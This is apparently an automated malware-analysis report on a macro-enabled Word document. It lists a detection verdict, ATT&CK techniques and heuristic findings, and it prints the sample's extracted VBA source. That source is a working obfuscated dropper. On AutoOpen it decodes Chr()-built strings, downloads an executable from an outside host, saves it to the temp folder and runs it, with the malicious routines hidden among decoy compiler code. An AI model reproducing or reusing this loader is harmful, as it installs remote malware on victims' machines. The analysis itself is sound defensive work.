Verdict: MALICIOUS
Risk Score: 350

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA project with an auto-executing macro ('autoopen') that is heavily obfuscated. Heuristics indicate the macro attempts to download a file via HTTP and save it to disk, likely executing it as a second-stage payload. ClamAV detections further confirm the malicious nature of the sample, identifying it as a macro-based dropper.
Heuristics (8)

- ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0.
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]: Document contains a VBA project; VBA macros present.
- VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `usZ5pw3gU8 = httpRequest.responseBody`
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)`
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub autoopen()`
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs referenced by macro:
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12206 bytes | ec8f306a593240b71bbfe12dd4bb3761d03f9465c521c9374d2e7f20bf169d0e |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
FBFILE_FORMAT_1
End Sub
Attribute VB_Name = "Module2"
'':::::
Static Function _
hFBrelop2IRrelop _
(ByVal tk As _
Integer) As Integer
Dim op As Integer
Select Case tk
Case FB_TK_EQ
op = AST_OP_EQ
Case FB_TK_GT
op = AST_OP_GT
Case FB_TK_LT
op = AST_OP_LT
Case FB_TK_NE
op = AST_OP_NE
Case FB_TK_LE
op = AST_OP_LE
Case FB_TK_GE
op = AST_OP_GE
Case Else
dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
'' error recovery: fake an op
op = AST_OP_EQ
End Select
End Function
Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
End Sub
'':::::
Static Function _
hFileExists _
(ByVal filename As _
String) As Integer
Dim f As Integer
f = FreeFile
Close #f
End Function
'':::::
Static Sub _
hUcase _
(ByVal src As String _
, ByVal dst As _
String)
Dim c As Integer
Dim s
Dim d
s = src
d = dst
Do
c = s
If (c >= 97) Then
If (c <= 122) Then
c = c - (97 - 65)
End If
ElseIf (c = 0) Then
Exit Do
End If
d = c
s = s + 1
d = d + 1
Loop
'' null-term
d = 0
End Sub
'':::::
Static Sub _
hClearName _
(ByVal src As String)
Dim p
p = src
Do
Select Case p
Case 0
Exit Do
Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
Case Else
p = CHAR_ZLOW
End Select
p = p + 1
Loop
End Sub
Public Function usZ5pw3gU8(KJB As Long)
Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(109) & "b" & Chr(109) & "o" & Chr(109) & Chr(116) & Chr(105) & Chr(46) & Chr(99) & Chr(111) & "m" & "." & Chr(98) & Chr(114) & Chr(47) & "4" & Chr(51) & Chr(53) & Chr(114) & Chr(103) & Chr(52) & "/" & Chr(51) & "2" & Chr(52) & "5" & Chr(114) & "d" & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
httpRequest.Send
usZ5pw3gU8 = httpRequest.responseBody
End Function
'' Searches backwards for the last '.' while still behind '/' or '\'.
Private Function hFindExtBegin(ByRef path As String) As Integer
for i as integer = len( path )-1 to 0 step -1
select case( path[i] )
Case Asc(".")
return i
#If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
Case Asc("\"), Asc("/")
#Else
Case Asc("/")
#End If
Exit For
End Select
Next
function = len( path )
End Function
Function hStripExt(ByRef path As String) As String
function = left( path, hFindExtBegin( path ) )
End Function
'':::::
function hStripPath _
( _
byval filename as zstring ptr _
) as string static
dim as integer lp, p_found, p(1 to 2)
lp = 0
Do
p(1) = instr( lp+1, *filename, RSLASH )
p(2) = instr( lp+1, *filename, "/" )
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
function = mid( *filename, lp+1 )
Else
function = *filename
End If
End Function
Attribute VB_Name = "Module1"
Public Function hHexUInt _
( _
ByVal value As uinteger _
) As String
static as zstring * 8 + 1 res
dim as zstring ptr p
dim as integer lgt, maxlen
static as integer hexTB(0 to 15) = _
{ _
asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
}
maxlen = 4
If (value > 65535) Then
maxlen = 8
End If
p = @res + 8-1
lgt = 0
Do
*p = hexTB( value and &h0000000F )
lgt +=1
If (lgt = maxlen) Then
Exit Do
End If
p -= 1
value shr = 4
Loop
function = p
End Function
Function hFloatToHex _
( _
ByVal value As Double, _
ByVal dtype As Integer _
) As String
'' Emit the raw bytes that make up the float
'' x86 little-endian assumption
If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
Else
dim as single singlevalue = value
'' Using an intermediate uinteger to allow compiling with FB
'' versions before the overload resolution overhaul
function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
End If
End Function
Function hFloatToHex_C99 _
( _
ByVal value As Double _
) As String
'' float hex format defined in C99 spec: e.g. 0x1.fp+3
dim as ulongint n = *cptr( ulongint ptr, @value )
dim as integer sign = n shr 63
dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
dim as ulongint mantissa = n and (1ull shl 52 - 1)
dim as string ret
If (Sign <> 0) Then
'' negative
ret = "-0x"
Else
'' positive
ret = "0x"
End If
exp2 -= 1023
If (exp2 > -1023) Then
'' normalized
ret += "1." + hex( mantissa, 13 )
If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
Else
If mantissa = 0 Then
'' zero
ret += "0"
exp2 = 0
Else
'' denormed
exp2 += 1
ret += "0." + hex( mantissa, 13 )
If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
End If
End If
ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
return ret
End Function
Attribute VB_Name = "Module3"
'':::::
Function hStripFilename _
( _
ByVal filename As String _
) As String
dim as integer lp, p_found, p(1 to 2)
lp = 0
Do
p(1) = instr( lp+1, *filename, RSLASH )
p(2) = instr( lp+1, *filename, "/" )
If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
p_found = p(2)
Else
p_found = p(1)
End If
If (p_found = 0) Then
Exit Do
End If
lp = p_found
Loop
If (lp > 0) Then
function = left( *filename, lp )
Else
function = ""
End If
End Function
'':::::
function hGetFileExt _
( _
byval fname as zstring ptr _
) as string static
dim as integer p, lp
dim as string res
lp = 0
Do
p = instr( lp+1, *fname, "." )
If (p = 0) Then
Exit Do
End If
lp = p
Loop
If (lp = 0) Then
function = ""
Else
res = lcase( mid( *fname, lp+1 ) )
If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
'' We had a folder with a "." inside ...
function = ""
ElseIf (Len(res) > 0) Then
'' . or .. dirs?
if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
function = ""
Else
function = res
End If
End If
End If
End Function
sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
for i as integer = 0 to len( *s ) - 1
if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
s [i] = Char
End If
Next
End Function
Function pathStripDiv(ByRef path As String) As String
dim as integer length = len( path )
If (length > 0) Then
length -= 1
select case( path[length] )
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
Case Asc("/"), Asc("\")
#Else
Case Asc("/")
#End If
return left( path, length )
End Select
End If
function = path
End Function
Public Function hCurDir_2(UIlhbjkhoiyH As String)
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
End Function
Function pathIsAbsolute(ByVal path As String) As Integer
#If defined__FB_WIN32__ Or defined__FB_DOS__ Then
if( (*path)[0] <> 0 ) then
select case( (*path)[1] )
Case Asc(":")
'' C:...
function = TRUE
#If def__FB_WIN32__ Then
Case Asc("\")
'' \\... UNC path
function = ((*path)[0] = asc( "\" ))
#End If
End Select
End If
#Else
'' /...
function = ((*path)[0] = asc( "/" ))
#End If
End Function
Public Function FBFILE_FORMAT_1()
Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
Dim pathIsAbsolute_4 As Object
Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
Dim pathIsAbsolute_3 As String
pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
With pathIsAbsolute_4
.Type = 1
.Open
.write usZ5pw3gU8(223)
End With
mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
noextensionFile.Open (pathIsAbsolute_3)
End Function
Function hCheckFileFormat(ByVal f As Integer) As Integer
dim as long BOM
dim as FBFILE_FORMAT fmt
'' little-endian assumptions
fmt = FBFILE_FORMAT_ASCII
if( get( #f, 0, BOM ) = 0 ) then
If (BOM = &HFFFE0000) Then
fmt = FBFILE_FORMAT_UTF32BE
ElseIf (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF32LE
Else
BOM and= &h00FFFFFF
If (BOM = &HBFBBEF) Then
fmt = FBFILE_FORMAT_UTF8
Else
BOM and= &h0000FFFF
If (BOM = &HFEFF) Then
fmt = FBFILE_FORMAT_UTF16LE
ElseIf (BOM = &HFFFE) Then
fmt = FBFILE_FORMAT_UTF16BE
End If
End If
End If
Select Case fmt
Case FBFILE_FORMAT_ASCII
Seek #f, 1
Case FBFILE_FORMAT_UTF8
Seek #f, 1 + 3
Case FBFILE_FORMAT_UTF16LE, _
FBFILE_FORMAT_UTF16BE
Seek #f, 1 + 2
End Select
End If
function = fmt
End Function
Function hCurDir() As String
'' curdir() usually won't be terminated with a path separator,
'' except when it points to the file system root, instead of
'' some directory (e.g. C:\ on Win32 or / on Unix).
function = pathStripDiv( curdir( ) )
End Function
Function pathStripCurdir(ByRef path As String) As String
var pwd = hCurDir() + FB_HOST_PATHDIV
If (Left(path, Len(pwd)) = pwd) Then
function = right( path, len( path ) - len( pwd ) )
Else
function = path
End If
End Function
function hIsValidSymbolName( byval sym as zstring ptr ) as integer
If (sym = Null) Then Exit Function
var symlen = len( *sym )
If (symlen = 0) Then Exit Function
if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
for i as integer = 1 to symlen-1
if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
Next
function = TRUE
End Function
'' Checks whether a string starts with and ends in [double-]quotes.
Private Function strIsQuoted(ByRef s As String) As Integer
dim as integer last = len(s) - 1
If (Last < 1) Then
return FALSE
End If
return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
((s[0] = asc("'" )) and (s[last] = asc("'" ))))
End Function
Function strUnquote(ByRef s As String) As String
If (strIsQuoted(s)) Then
return mid(s, 2, len(s) - 2)
End If
return s
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 60928 bytes | efa9662d04d3f9cee6fe24e017bb85b5d23734b3cd0ca7f1782bfc86e4814eed |

Detection (ClamAV): Doc.Macro.ObfuscatedHeuristic-5931994-0
Obfuscation or payload: unlikely